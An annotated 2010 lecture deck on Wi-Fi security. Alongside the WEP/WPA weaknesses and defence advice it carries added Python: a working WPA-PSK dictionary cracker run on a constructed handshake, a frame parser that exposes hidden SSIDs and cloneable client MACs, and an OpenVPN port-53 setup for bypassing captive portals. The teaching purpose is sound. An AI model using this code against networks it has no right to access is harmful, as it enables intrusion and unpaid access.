
WI-FI SECURITY

A gentle introduction to Hacking Wi-Fi

Thursday, February 25, 2010

PRESENTED BY

Paul Gillingwater, CISSP, CISM


Adjunct Professor of Computer Science
Webster University Vienna
http://security-risk.blogspot.com
Working in IT Security 20+ years


A BRIEF OVERVIEW
Wi-Fi has been around for more than 12 years -- originally it lacked any form of security
Since 2001, Wired Equivalent Privacy (WEP) has been successfully attacked -- by 2007 no more than about 90,000 captured packets were needed to recover the key (due to weaknesses in how RC4 is keyed per packet), with a cracking time of less than 1 minute
Since 2003/2004, Wi-Fi Protected Access (WPA, then WPA2) has been available to address WEP's failures -- but even this is not quite enough for full security


WI-FI HISTORY
Originally offered as IEEE 802.11 in 1997 -- security limited partly due to export restrictions on cryptography imposed by certain governments
Implements Wireless LAN access over the 2.4 and 5 GHz bands -- the former with only 3 non-overlapping channels (and shared with Amateur Radio, cordless phones and microwave ovens), the latter with 19 (in Europe)
Initial systems 1-2 Mbps, later increased to 11 Mbps with 802.11b, 54 Mbps with 802.11a/g, then 802.11n (ratified 2009) with up to 600 Mbps possible


WIRELESS SIGNALS
Any wireless signal can be received by suitable equipment -- you cannot restrict who listens
Key-sharing is the fundamental issue -- and the more traffic is encrypted under the same key, the easier it is to recover (WEP derives each packet's RC4 key from the shared secret and a 24-bit IV, so keystreams repeat and leak the key)
In addition to receiving packets, we can also inject packets -- e.g., replaying ARP requests to generate traffic, or sending de-authentication frames to force stations to reconnect


SECURING WI-FI
In my view, the only reliable method for securing Wi-Fi is to run a VPN on top (e.g., OpenVPN)
WEP and WPA/TKIP are broken (in 2009 the Japanese researchers Ohigashi and Morii showed TKIP packets can be decrypted and forged in about 1 minute -- this recovers keystream and the MIC key, not the PSK itself)
WPA uses TKIP (still RC4 underneath) -- WPA2 uses CCMP, which is better (AES)
WPA2 is probably secure enough for home usage -- but there is still a risk of impersonation (a rogue AP using your SSID) and of offline dictionary attacks against a weak pre-shared key


TRAFFIC MONITORING
On OS X, from the command line (with sudo):
/System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport en1 sniff 1
The parameters are the interface (en1), the sniff mode and the channel (1) -- packets are captured into a /tmp/airportSniffXXXX.cap file (the XXXX part is chosen by the tool)
Wireshark is a free utility for Windows, OS X or Linux that captures and displays packets -- it decodes the 802.11 headers, and can decrypt WPA/WPA2 traffic if you give it the PSK and it has seen the station's key handshake


HOW WPA WORKS
WPA tried to fix WEP's problems on existing hardware (TKIP keeps RC4 but re-keys per packet), while WPA2 (IEEE 802.11i) was a new approach to solving the security problem
802.1X port access control is key to successful use
This Enterprise approach depends on a separate RADIUS authentication server -- each new session gets a fresh master key, good for a short time
Home networks don't use RADIUS, so a Pre-Shared Key (PSK) is used instead -- the same secret on every device, derived from the pass-phrase and the SSID


WPA KEY HANDSHAKE
(diagram not reproduced in this extract)
In the four-way handshake the AP sends a random ANonce; the station replies with its own SNonce plus a MIC; both sides derive the session key (PTK) from the master key, the two nonces and the two MAC addresses; the AP then delivers the group key and the station acknowledges it
Anyone who captures these frames has everything needed to test guesses at the PSK offline -- the pass-phrase itself is never transmitted

COW PATTY ATTACK
Where 802.1X is not available, the key handshake of other authenticating stations may be sniffed -- the PSK is not in it, but the MIC lets each guess be checked
KisMAC and coWPAtty use dictionary and other attacks to guess the PSK from the captured packets
Packet injection (de-auth) can force re-connects so that a handshake is captured
coWPAtty with Rainbow Tables (hashes pre-calculated for a list of common SSIDs, since the SSID is the salt) can test >18,000 pass-phrases per second -- an unusual SSID makes the tables useless


WPA CRACKER
Regular WPA-PSK cracking on business-grade hardware can take up to two weeks
WPA Cracker is a commercial service using cloud-based computing with 400 nodes, which can run a dictionary attack on a captured WPA handshake in 20 minutes for $34
This is based on a 135 million word dictionary attack -- therefore a strong pass-phrase (long and not in any word list) defeats this class of attack
Businesses now know the price of security
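The handshake, coWPAtty and WPA Cracker slides all describe one computation, so here it is once, worked through in Python. This is an example added for this edit, not code from the talk or from coWPAtty: it derives the PMK from pass-phrase and SSID, expands it to the PTK with both nonces and both MAC addresses, and checks candidate pass-phrases against the MIC of message 2 of the four-way handshake. The key-derivation formulas are those of IEEE 802.11i and the PBKDF2 check value (pass-phrase "password", SSID "IEEE") is the standard's own test vector; the SSID "Webster-Wi-Fi", the MAC addresses, the nonces and the EAPOL-Key frame are constructed for illustration.

```python
"""WPA/WPA2-PSK key derivation and the offline dictionary attack on a
captured four-way handshake (what coWPAtty and WPA Cracker implement).
Added example; every frame below is constructed, not captured."""
import hashlib
import hmac

MIC_OFFSET = 81   # offset of the 16-byte Key MIC field inside an EAPOL-Key frame


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    # The SSID is the salt (why rainbow tables are tied to common SSIDs) and the
    # 4096 iterations are the only thing slowing a dictionary attack down.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    # 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, concatenated.
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-512(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces))
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes, ccmp: bool = True) -> bytes:
    # The MIC covers the whole EAPOL-Key frame with its MIC field zeroed.
    # WPA2/CCMP: HMAC-SHA1 truncated to 16 bytes; WPA/TKIP: HMAC-MD5.
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    if ccmp:
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    return hmac.new(kck, zeroed, hashlib.md5).digest()


def build_msg2(snonce: bytes, replay_counter: int = 1) -> bytes:
    # Constructed EAPOL-Key frame (message 2 of 4) using the standard field layout:
    # 802.1X header version(1) type(1)=3 length(2); descriptor type(1)=2 (RSN),
    # key info(2), key length(2), replay counter(8), nonce(32), IV(16), RSC(8),
    # ID(8), MIC(16), key data length(2).  Real frames also carry an RSN IE.
    body = (bytes([2]) + b"\x01\x0a" + b"\x00\x00" + replay_counter.to_bytes(8, "big")
            + snonce + bytes(16) + bytes(8) + bytes(8) + bytes(16) + b"\x00\x00")
    return bytes([1, 3]) + len(body).to_bytes(2, "big") + body


def crack_psk(wordlist, ssid, ap_mac, sta_mac, anonce, snonce, msg2, ccmp=True):
    """Offline dictionary attack: everything except the pass-phrase is in the capture."""
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2, ccmp), captured_mic):
            return candidate
    return None


def demo(passphrase: str, wordlist):
    """Simulate an AP/station handshake under the given pass-phrase, then attack it."""
    ssid = "Webster-Wi-Fi"                                    # constructed
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))   # fixed rather than random, for repeatability
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    msg2 = build_msg2(snonce)
    msg2 = msg2[:MIC_OFFSET] + eapol_mic(kck, msg2) + msg2[MIC_OFFSET + 16:]   # station fills in the MIC
    return crack_psk(wordlist, ssid, ap_mac, sta_mac, anonce, snonce, msg2)


if __name__ == "__main__":
    words = ["password", "letmein", "webster2010", "springfield", "correct horse"]
    print("weak PSK recovered:", demo("webster2010", words))           # in the list: found
    print("strong PSK recovered:", demo("Xq7!vR2#pLm9$wZ4&b", words))  # not in the list: None
```

Note that nothing in the capture is secret except the pass-phrase: the SSID, both MAC addresses, both nonces and the MIC are all sent in the clear, so the only defence is a pass-phrase that no word list will ever contain.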


BOGUS HOTSPOTS
Any computer can also be a Wireless Access Point
Windows 7 has a new feature, SoftAP -- which can be used for Internet Connection Sharing (use Connectify for example -- http://connectify.me/)
However, the bad guys can capture all of the packets which pass through their system, even if you connect to them with WEP or WPA -- the encryption only protects the link to the access point, and they are the access point
Bad guys can use similar names, e.g., Webster-Wi-Fi


MAC SPOOFING
Some Access Points allow restriction based on the MAC (Media Access Control) address
This is good basic security, but not reliable -- because the MAC address is sent in the clear in every frame, so attackers can simply sniff for a trusted address and use that in their own systems
802.1X makes this more difficult for attackers, since the client must also authenticate


SUPPRESSING SSID
Most Wi-Fi networks broadcast their network name -- called the SSID
Security may be improved slightly by disabling this feature for a home or business network
However, experienced hackers will simply monitor authorized connections to learn the SSID -- it is still sent unencrypted in probe responses and association requests (and your own clients will probe for the hidden name wherever they go)
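To make concrete what the airport sniffer and Wireshark actually see, why injected de-authentication frames matter, and why MAC filtering and a hidden SSID are only a minor hurdle, here is a small 802.11 management-frame parser in Python, added for this edit and not part of the original talk. It works on raw frames (what a monitor-mode capture yields once the radiotap header is stripped); the access point, station and SSID below are constructed, not captured.

```python
"""Passive 802.11 monitoring over management frames.  Added example:
the beacon, probe response, association request and de-auth frames
below are built by hand to mimic what a monitor-mode capture contains."""
from collections import defaultdict

BEACON, PROBE_RESP, ASSOC_REQ, DEAUTH = 8, 5, 0, 12   # 802.11 management subtypes


def mac(s: str) -> bytes:                 # "00:11:22:33:44:55" -> 6 raw bytes
    return bytes.fromhex(s.replace(":", ""))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def mgmt_frame(subtype: int, da: str, sa: str, bssid: str, body: bytes) -> bytes:
    # Frame control: type 0 (management) in bits 2-3, subtype in bits 4-7; then
    # duration(2), addr1=DA(6), addr2=SA(6), addr3=BSSID(6), sequence control(2).
    fc = bytes([subtype << 4, 0])
    return fc + b"\x00\x00" + mac(da) + mac(sa) + mac(bssid) + b"\x00\x00" + body


def ie(eid: int, data: bytes) -> bytes:   # information element: id, length, value
    return bytes([eid, len(data)]) + data


def parse_ies(data: bytes) -> dict:
    ies, i = {}, 0
    while i + 2 <= len(data):
        eid, ln = data[i], data[i + 1]
        ies[eid] = data[i + 2:i + 2 + ln]
        i += 2 + ln
    return ies


def observe(frames) -> dict:
    """Fold captured management frames into what an attacker learns per BSSID."""
    nets = defaultdict(lambda: {"ssid": None, "hidden": False, "stations": set(), "deauth": 0})
    for f in frames:
        subtype = f[0] >> 4
        a2, a3 = mac_str(f[10:16]), mac_str(f[16:22])      # source, BSSID
        body = f[24:]
        if subtype in (BEACON, PROBE_RESP):
            # body: timestamp(8) beacon interval(2) capability(2) then IEs; IE 0 is the SSID
            ssid = parse_ies(body[12:]).get(0, b"")
            if ssid:
                nets[a3]["ssid"] = ssid.decode(errors="replace")   # probe responses carry it even when hidden
            elif subtype == BEACON:
                nets[a3]["hidden"] = True
        elif subtype == ASSOC_REQ:
            # body: capability(2) listen interval(2) then IEs; the client names the SSID in clear
            ssid = parse_ies(body[4:]).get(0, b"")
            nets[a3]["stations"].add(a2)                          # a trusted MAC an attacker can clone
            if ssid:
                nets[a3]["ssid"] = ssid.decode(errors="replace")
        elif subtype == DEAUTH:
            nets[a3]["deauth"] += 1                               # a burst here suggests injected de-auths
    return dict(nets)


def sample_capture():
    """Constructed frames: a hidden-SSID AP, one legitimate client, and a de-auth burst."""
    ap, client, bcast = "00:11:22:33:44:55", "66:77:88:99:aa:bb", "ff:ff:ff:ff:ff:ff"
    fixed = bytes(8) + b"\x64\x00" + b"\x11\x04"                       # timestamp, 100 TU, capability
    hidden_beacon = mgmt_frame(BEACON, bcast, ap, ap, fixed + ie(0, b"") + ie(1, b"\x82\x84"))
    probe_resp = mgmt_frame(PROBE_RESP, client, ap, ap, fixed + ie(0, b"Webster-Wi-Fi"))
    assoc = mgmt_frame(ASSOC_REQ, ap, client, ap, b"\x11\x04\x0a\x00" + ie(0, b"Webster-Wi-Fi"))
    deauths = [mgmt_frame(DEAUTH, client, ap, ap, b"\x07\x00") for _ in range(5)]  # source spoofed as AP
    return [hidden_beacon, probe_resp, assoc] + deauths


if __name__ == "__main__":
    for bssid, info in observe(sample_capture()).items():
        print(bssid, info)
```

The same loop over data frames would collect station addresses for an AP that no client is currently joining, and the de-auth counter is exactly the signal a wireless IDS keys on: a legitimate network does not send five de-authentications to one client in a row.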


MAN IN THE MIDDLE
A MITM attack means the intruder pretends to be the authorized gateway, but intercepts and can change packets (this was used by the Japanese team with TKIP)
Example: Video of the Cain tool, with packet capture and WEP cracking
cracking-wep-with-airpcap-packet-injection-and-cain-and-abel.wmv


BYPASSING AIRPORT WI-FI
Frequent airport travelers know about airport Wi-Fi
Such systems (captive portals) intercept HTTP and redirect to a login page before allowing access (e.g., Boingo Hotspot)
Most airport Wi-Fi allows DNS lookups before login -- some directly to any server, and some only via the hotspot's own DNS relay
If UDP port 53 is passed through, then you can run OpenVPN on UDP port 53 on your home system and tunnel everything through it
If DNS is relayed, then use a DNS tunnel, which smuggles data inside DNS queries and answers (Linux mostly)
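A minimal OpenVPN pair for the port-53 trick, added here as an example (not from the slides). The hostname home.example.com, the certificate file names and the tunnel subnet 10.8.0.0/24 are assumed placeholders, and the DNS push assumes a resolver is listening on the home end of the tunnel.

```conf
# --- server side, on the home system (assumes certificates already issued with easy-rsa) ---
port 53                          # listen where captive portals often let "DNS" through
proto udp
dev tun
ca ca.crt
cert server.crt
key server.key
dh dh2048.pem
server 10.8.0.0 255.255.255.0    # assumed tunnel subnet
push "redirect-gateway def1"     # send all client traffic through the tunnel, not the hotspot
push "dhcp-option DNS 10.8.0.1"  # resolve names at home (assumes a resolver on 10.8.0.1)
keepalive 10 60

# --- client side, on the laptop ---
client
dev tun
proto udp
remote home.example.com 53       # assumed hostname; the portal's DNS relay will resolve it
ca ca.crt
cert client.crt
key client.key
remote-cert-tls server           # refuse a rogue hotspot impersonating the home server
```

The check before relying on this: if the portal answers UDP/53 itself rather than forwarding it, OpenVPN's packets never reach home and the client just times out; that is the case the slide covers with a DNS tunnel. Pushing the DNS option matters as much as the tunnel itself, otherwise every name you look up still goes to the hotspot's resolver in the clear.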


AIRPORT RISKS
Free Wi-Fi hotspots in an airport or cafe might belong to a hacker, who is capturing traffic -- including, potentially, user names & passwords
Hackers can also relay HTTPS through their own proxy -- you should see a certificate warning, but many people click through, so don't assume your password is safe at a public Hot Spot
Most hotspots don't use WEP or WPA -- so most traffic is not encrypted (unless SSH, SSL or a VPN is used)


WI-FI SECURITY ADVICE
Avoid WEP and WPA/TKIP; use WPA2 or WPA/AES (CCMP)
If using in a business, use 802.1X -- otherwise make sure you have a PSK longer than 20 characters that is not a dictionary word or phrase
Use MAC access control (restrict connecting devices based on their hardware address) -- a minor hurdle only, since the address can be spoofed
Use a VPN for truly sensitive information


COMMERCIAL RISKS
TJ Maxx (TJX) is the classic example of a Wi-Fi attack vector: resulted in the loss of 45 million customer records (credit card details)
The weakness was the use of WEP to secure a store LAN, which was exploited by the hackers
This breach cost the company $12 million in direct costs, not including the subsequent remedial work and loss of PCI compliance
Average cost of a Data Breach rose to $200 per customer record in 2009, according to a Ponemon Institute study -- average total cost rose to $6.75m


LEGAL ASPECTS
In many countries, hacking others' Wi-Fi is illegal -- therefore, do any tests using your OWN gear
See the NCSL web site for a summary of US state laws
Unauthorized access can attract serious prosecutions, fines and criminal charges
Within Webster University, unauthorized Wi-Fi access could be grounds for expulsion


LATEST WI-FI TRENDS
Passive-aggressive SSIDs now used by some... e.g.:
YOURDOGPOOPSINMYYARD
TURNTHEMUSICDOWN
CAITLINSTOPUSINGOURINTERNET
WECANHEARYOUHAVINGSEX
OBAMAISASOCIALIST


THANK YOU!

Any questions?
Comments?
Discussion....
